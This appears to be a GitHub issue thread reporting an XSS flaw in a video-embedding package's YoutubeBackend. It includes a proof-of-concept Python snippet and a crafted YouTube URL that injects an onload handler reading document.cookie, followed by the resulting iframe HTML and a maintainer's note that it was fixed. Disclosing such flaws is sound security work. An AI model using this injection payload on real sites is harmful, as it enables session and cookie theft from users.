XSS possible in YoutubeBackend with user-provided URL

[Remiz]

Hi,

I think I've noticed a possible XSS using this package when users are allowed to provide urls. Here is the code I've used reproduce the issue:

import embed_video

url = 'https://www.youtube.com/watch?v=\asa\C0DPdy98e4c?wmode=opa\queenablejsapi=1origin=https%3A%2F%2Fwww.aa%22aaaa.com onload=%22javascript:alert(document.cookie)%22'
video = embed_video.backends.detect_backend(url)
video.is_secure = True
print(video.get_embed_code(800, 400))

And here is the result of the embedded code:

<iframe width="800" height="400" src="https://www.youtube.com/embed/sa\C0DPdy98e4c?wmode=opa\queenablejsapi=1origin=https://www.aa"aaaa.com onload="javascript:alert(document.cookie)"?wmode=opaque" loading="lazy" frameborder="0" allowfullscreen></iframe>

It looks like the url encoded double quotes are decoded by urlparse.parse_qs somehow.

[aleksihakli]

Hi and thanks for catching this.

The URL needs to be validated and sanitized. Would anyone happen to have ideas and time for improving the security?

[aleksihakli]

Fixed by #187